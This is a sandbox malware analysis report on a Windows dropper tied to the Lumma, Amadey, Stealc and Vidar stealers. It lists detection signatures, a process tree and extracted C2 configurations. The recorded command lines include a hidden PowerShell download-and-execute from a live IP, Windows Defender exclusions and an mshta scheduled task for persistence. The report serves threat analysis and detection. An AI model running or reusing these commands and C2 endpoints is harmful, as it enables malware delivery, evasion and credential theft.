Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
EdYEXasNiR.exe

Overview

General Information

Sample name:EdYEXasNiR.exe
renamed because original name is a hash value
Original sample name:0be97a686bb58f470d1d096a12097fa8.exe
Analysis ID:1582828
MD5:0be97a686bb58f470d1d096a12097fa8
SHA1:b35c19eb80c62bfae9ed4561165729bf96d3ea99
SHA256:02c7411fd491368727387ac793e3bb3fcd9b792f1a18cec7c0da5cd65cbccc72
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC, Amadey, Babadeda, LummaC Stealer, Stealc, Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Attempt to bypass Chrome Application-Bound Encryption
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and execute file
Yara detected Amadey
Yara detected Amadeys stealer DLL
Yara detected Babadeda
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
Yara detected obfuscated html page
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Creates HTML files with .exe extension (expired dropper behavior)
Creates multiple autostart registry keys
Drops PE files to the document folder of the user
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found many strings related to Crypto-Wallets (likely being stolen)
Found pyInstaller with non standard icon
Hides threads from debuggers
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Monitors registry run keys for changes
PE file contains section with special chars
PE file has nameless sections
Powershell drops PE file
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: PowerShell DownloadFile
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
Sigma detected: Suspicious MSHTA Child Process
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to download and execute files (via powershell)
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Sigma detected: Browser Started with Remote Debugging
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • EdYEXasNiR.exe (PID: 6464 cmdline: "C:\Users\user\Desktop\EdYEXasNiR.exe" MD5: 0BE97A686BB58F470D1D096A12097FA8)
    • DX0TGIT2LZWIIEDZ8Y3A15R.exe (PID: 2656 cmdline: "C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe" MD5: 3F6AB8A7E543EE65455B7D923402EF58)
      • chrome.exe (PID: 7184 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
        • chrome.exe (PID: 7416 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2416 --field-trial-handle=2152,i,11031812561136754540,12085514892588274456,262144 /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
      • msedge.exe (PID: 3852 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="" MD5: 69222B8101B0601CC6663F8381E7E00F)
        • msedge.exe (PID: 6464 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2312 --field-trial-handle=2148,i,10048407555887453736,9436864136807657335,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
      • cmd.exe (PID: 7416 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\HJEHIJEBKE.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • HJEHIJEBKE.exe (PID: 7892 cmdline: "C:\Users\user\Documents\HJEHIJEBKE.exe" MD5: 69E09CBF7B56454D9FF5686CD8FE492F)
        • Conhost.exe (PID: 3404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • 456YTTQ213T2RO9QAEYSNNZDL.exe (PID: 3696 cmdline: "C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exe" MD5: 69E09CBF7B56454D9FF5686CD8FE492F)
      • skotes.exe (PID: 4780 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 69E09CBF7B56454D9FF5686CD8FE492F)
  • skotes.exe (PID: 4884 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 69E09CBF7B56454D9FF5686CD8FE492F)
  • msedge.exe (PID: 2620 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7212 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2324 --field-trial-handle=2008,i,2217384488025341277,266429373537081613,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • skotes.exe (PID: 7832 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 69E09CBF7B56454D9FF5686CD8FE492F)
    • f3d6f9fcfe.exe (PID: 8064 cmdline: "C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe" MD5: C821E7D7DAC978E7D5E8F35B0FE2AF88)
      • conhost.exe (PID: 7608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7400 cmdline: "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\C0C9.tmp\C0CA.tmp\C0CB.bat C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • cmd.exe (PID: 7364 cmdline: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe" any_word MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • f3d6f9fcfe.exe (PID: 7432 cmdline: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe any_word MD5: C821E7D7DAC978E7D5E8F35B0FE2AF88)
            • cmd.exe (PID: 7456 cmdline: "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\C1B3.tmp\C1B4.tmp\C1B5.bat C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe any_word" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • cbfb8a9c89.exe (PID: 7948 cmdline: "C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe" MD5: 9BE5AC720DCF1838FD5A2D7352672F66)
      • conhost.exe (PID: 6100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6180 cmdline: "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\wOXcVegx' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 4448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 4384 cmdline: "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\Users' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 5304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • jyidkjkfhjawd.exe (PID: 7064 cmdline: "C:\wOXcVegx\jyidkjkfhjawd.exe" MD5: 1B40450E11F71DA7D6F3D9C025C078E0)
    • 64252d274d.exe (PID: 7224 cmdline: "C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exe" MD5: 9AB250B0DC1D156E2D123D277EB4D132)
      • conhost.exe (PID: 7680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • 64252d274d.exe (PID: 7584 cmdline: "C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exe" MD5: 9AB250B0DC1D156E2D123D277EB4D132)
    • 696689ce6d.exe (PID: 1072 cmdline: "C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exe" MD5: 87330F1877C33A5A6203C49075223B16)
    • 0fb12e043c.exe (PID: 7564 cmdline: "C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe" MD5: 26F7294CA7A10C65B44057525A233636)
    • 522bb7a019.exe (PID: 7272 cmdline: "C:\Users\user\AppData\Local\Temp\1027566001\522bb7a019.exe" MD5: 19861D67B2811D6EB3BE1951B28703AE)
  • f3d6f9fcfe.exe (PID: 5404 cmdline: "C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe" MD5: C821E7D7DAC978E7D5E8F35B0FE2AF88)
    • conhost.exe (PID: 5888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 1948 cmdline: "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\F7C7.tmp\F7C8.tmp\F7C9.bat C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 5884 cmdline: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe" any_word MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • f3d6f9fcfe.exe (PID: 6636 cmdline: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe any_word MD5: C821E7D7DAC978E7D5E8F35B0FE2AF88)
          • cmd.exe (PID: 6732 cmdline: "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\F9BB.tmp\F9BC.tmp\F9BD.bat C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe any_word" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • cmd.exe (PID: 1792 cmdline: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • powershell.exe (PID: 1476 cmdline: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: 04029E121A0CFA5991749937DD22A1D9)
            • cmd.exe (PID: 6876 cmdline: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • powershell.exe (PID: 4008 cmdline: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: 04029E121A0CFA5991749937DD22A1D9)
            • mshta.exe (PID: 3388 cmdline: mshta "C:\Temp\.hta" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
              • powershell.exe (PID: 6656 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d; MD5: 04029E121A0CFA5991749937DD22A1D9)
                • conhost.exe (PID: 1076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • 483d2fa8a0d53818306efeb32d3.exe (PID: 7356 cmdline: "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe" MD5: 69E09CBF7B56454D9FF5686CD8FE492F)
                  • Conhost.exe (PID: 8080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • schtasks.exe (PID: 6528 cmdline: schtasks /delete /tn "AutoRunHTA" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 1988 cmdline: schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
  • f3d6f9fcfe.exe (PID: 3400 cmdline: "C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe" MD5: C821E7D7DAC978E7D5E8F35B0FE2AF88)
    • conhost.exe (PID: 2372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 3120 cmdline: "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\18EB.tmp\18EC.tmp\18ED.bat C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 1180 cmdline: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe" any_word MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • f3d6f9fcfe.exe (PID: 5672 cmdline: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe any_word MD5: C821E7D7DAC978E7D5E8F35B0FE2AF88)
          • cmd.exe (PID: 4612 cmdline: "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\1B0E.tmp\1B0F.tmp\1B10.bat C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe any_word" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • cmd.exe (PID: 4468 cmdline: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • powershell.exe (PID: 4472 cmdline: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: 04029E121A0CFA5991749937DD22A1D9)
            • cmd.exe (PID: 2700 cmdline: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • powershell.exe (PID: 3404 cmdline: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: 04029E121A0CFA5991749937DD22A1D9)
            • mshta.exe (PID: 7264 cmdline: mshta "C:\Temp\.hta" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
              • powershell.exe (PID: 7380 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d; MD5: 04029E121A0CFA5991749937DD22A1D9)
                • conhost.exe (PID: 7432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • 483d2fa8a0d53818306efeb32d3.exe (PID: 5344 cmdline: "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe" MD5: 69E09CBF7B56454D9FF5686CD8FE492F)
            • schtasks.exe (PID: 7452 cmdline: schtasks /delete /tn "AutoRunHTA" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 5692 cmdline: schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
NameDescriptionAttributionBlogpost URLsLink
BabadedaAccording to PCrisk, Babadeda is a new sample in the crypters family, allowing threat actors to encrypt and obfuscate the malicious samples. The obfuscation allows malware to bypass the majority of antivirus protections without triggering any alerts. According to the researchers analysis, Babadeda leverages a sophisticated and complex obfuscation that shows a very low detection rate by anti-virus engines.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.babadeda
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "stok"}

Threatname: LummaC

{"C2 url": ["wholersorie.shop", "framekgirus.shop", "cloudewahsj.shop", "tirepublicerj.shop", "noisycuttej.shop", "abruptyopsn.shop", "fancywaxxers.shop", "rabidcowse.shop", "nearycrepso.shop"], "Build id": "PsFKDg--pablo"}

Threatname: Amadey

{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Temp\.gifJoeSecurity_ObshtmlYara detected obfuscated html pageJoe Security
    C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exeJoeSecurity_BabadedaYara detected BabadedaJoe Security
      C:\Temp\5ZycQXqae.txtJoeSecurity_ObshtmlYara detected obfuscated html pageJoe Security
        C:\Temp\3GEgnMlRi.txtJoeSecurity_ObshtmlYara detected obfuscated html pageJoe Security
          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[2].exeJoeSecurity_BabadedaYara detected BabadedaJoe Security

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            0000001C.00000002.2272143312.00000000006C1000.00000040.00000001.01000000.00000010.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
              0000004B.00000002.2646109112.0000000000C01000.00000040.00000001.01000000.0000001E.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                00000024.00000003.2395728481.0000000001508000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  0000002F.00000003.4825063904.00000000009F1000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    00000041.00000003.2682807652.00000000007C4000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                      Click to see the 38 entries

                      Unpacked PEs

                      SourceRuleDescriptionAuthorStrings
                      19.2.f3d6f9fcfe.exe.400000.0.unpackJoeSecurity_BabadedaYara detected BabadedaJoe Security
                        24.2.f3d6f9fcfe.exe.400000.0.unpackJoeSecurity_BabadedaYara detected BabadedaJoe Security
                          19.0.f3d6f9fcfe.exe.400000.0.unpackJoeSecurity_BabadedaYara detected BabadedaJoe Security
                            44.2.f3d6f9fcfe.exe.400000.0.unpackJoeSecurity_BabadedaYara detected BabadedaJoe Security
                              24.0.f3d6f9fcfe.exe.400000.0.unpackJoeSecurity_BabadedaYara detected BabadedaJoe Security
                                Click to see the 16 entries

                                Other

                                SourceRuleDescriptionAuthorStrings
                                amsi64_6656.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                                  amsi64_7380.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

                                    Sigma Signatures

                                    System Summary

                                    barindex
                                    Sigma detected: Invoke-Obfuscation CLIP+ Launcher
                                    Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /rl HIGHEST /f, CommandLine: schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /rl HIGHEST /f, CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\F9BB.tmp\F9BC.tmp\F9BD.bat C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe any_word", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6732, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /rl HIGHEST /f, ProcessId: 1988, ProcessName: schtasks.exe
                                    Sigma detected: Invoke-Obfuscation VAR+ Launcher
                                    Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /rl HIGHEST /f, CommandLine: schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /rl HIGHEST /f, CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\F9BB.tmp\F9BC.tmp\F9BD.bat C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe any_word", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6732, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /rl HIGHEST /f, ProcessId: 1988, ProcessName: schtasks.exe
                                    Sigma detected: New RUN Key Pointing to Suspicious Folder
                                    Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 7832, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\f3d6f9fcfe.exe
                                    Sigma detected: PowerShell DownloadFile
